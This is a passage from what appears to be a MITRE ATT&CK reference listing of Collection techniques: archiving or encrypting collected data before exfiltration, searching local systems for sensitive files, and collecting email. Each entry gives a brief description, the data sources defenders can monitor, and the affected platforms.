Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre